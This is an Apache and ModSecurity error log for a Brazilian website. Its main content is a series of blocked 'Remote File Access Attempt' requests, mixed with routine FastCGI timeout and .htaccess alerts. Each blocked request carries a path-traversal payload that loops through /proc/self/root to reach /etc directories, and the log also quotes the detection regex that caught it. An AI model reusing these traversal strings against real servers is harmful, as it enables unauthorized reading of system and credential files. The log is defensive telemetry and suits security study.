[Wed Mar 18 16:52:12.215113 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:45636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCbPu8EFLIOrSqIps81gAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:52:15.045822 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41730] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:52:31.201709 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:58398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCf9a6ubjKNq_cu4baYgAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:52:44.137866 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42410] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:52:48.522935 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:48856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCkCmAPhZkrhU8w4mmfQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:52:51.961309 2026] [core:alert] [pid 14269:tid 140411607643904] [client 57.141.18.13:43746] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:52:55.312564 2026] [mime_magic:error] [pid 9530:tid 140411683178240] (70014)End of file found: [client 57.141.18.8:43202] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:53:02.683960 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:51056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCnkzinOy1jxa1j4dacQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:53:08.809807 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42940] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:53:13.629986 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.241.31:49390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCqew_le52K8_3pV0YnAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:53:22.486768 2026] [:error] [pid 9800:tid 140411716749056] [client 74.7.241.31:47478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCsYJpNEVVDhwB8vOCOAAAA4M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:53:23.967687 2026] [mime_magic:error] [pid 9800:tid 140411674785536] (70014)End of file found: [client 57.141.18.119:43436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:53:31.125883 2026] [proxy_fcgi:error] [pid 9530:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43366] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:53:58.053828 2026] [proxy_fcgi:error] [pid 9800:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43860] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:54:00.274924 2026] [core:alert] [pid 17887:tid 140411624429312] [client 57.141.18.51:44918] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:54:09.088955 2026] [mime_magic:error] [pid 9800:tid 140411683178240] (70014)End of file found: [client 57.141.18.55:45310] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:54:30.133822 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44496] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:54:31.715613 2026] [:error] [pid 9333:tid 140411616036608] [client 74.7.241.31:47218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absC9w_eYRmh974Uj6QA8AAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:54:33.514785 2026] [mime_magic:error] [pid 23798:tid 140411733534464] (70014)End of file found: [client 57.141.18.110:45762] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:54:35.376158 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 57.141.18.116:45796] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:54:42.979666 2026] [:error] [pid 9333:tid 140411616036608] [client 74.7.241.31:58730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDAg_eYRmh974Uj6QA9AAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 16:54:52.619559 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:54192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDDOw_le52K8_3pV0Y0AAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:54:53.141803 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44970] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:54:59.051129 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:58738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDE-oXxyEfFpUF8f-ytwAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:55:04.934429 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:59776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDGEzinOy1jxa1j4dakQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:55:16.125815 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45430] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:55:16.471254 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:59776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDJEzinOy1jxa1j4daogAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:55:38.125815 2026] [proxy_fcgi:error] [pid 27403:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45868] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:56:02.142992 2026] [proxy_fcgi:error] [pid 9333:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46400] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:56:31.133846 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46974] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:56:33.650469 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.243.128:60926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDcf-YZRR_7pZ7nDItUAAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:56:47.841275 2026] [mime_magic:error] [pid 23798:tid 140411557287680] (70014)End of file found: [client 57.141.18.23:48034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:56:51.543577 2026] [mime_magic:error] [pid 27403:tid 140411683178240] (70014)End of file found: [client 57.141.18.62:48328] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:57:01.126220 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47644] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:57:10.054152 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:57626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDlimAPhZkrhU8w4mm2gAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:57:15.170325 2026] [:error] [pid 23798:tid 140411632822016] [client 74.7.243.128:39676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDmz-9rzzdA3Ti0NCN9AAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:57:27.431908 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:50492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absDp-w_le52K8_3pV0Y8wAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:57:32.402904 2026] [mime_magic:error] [pid 26799:tid 140411741927168] (70014)End of file found: [client 57.141.18.47:49068] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:57:32.871786 2026] [core:alert] [pid 9333:tid 140411590858496] [client 74.7.241.31:51816] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/ssl
[Wed Mar 18 16:57:34.137787 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48216] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:57:34.473382 2026] [mime_magic:error] [pid 17653:tid 140411565680384] (70014)End of file found: [client 57.141.18.70:49104] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:58:11.933951 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48990] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:58:40.109733 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49598] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:59:04.108742 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50070] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:59:27.129114 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:59:53.045891 2026] [proxy_fcgi:error] [pid 9530:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50966] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:00:17.139475 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51424] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:00:39.125809 2026] [proxy_fcgi:error] [pid 27403:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:00:56.123881 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 57.141.18.86:52602] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:01:03.057878 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52266] AH01075: Error dispatching request to : (polling)
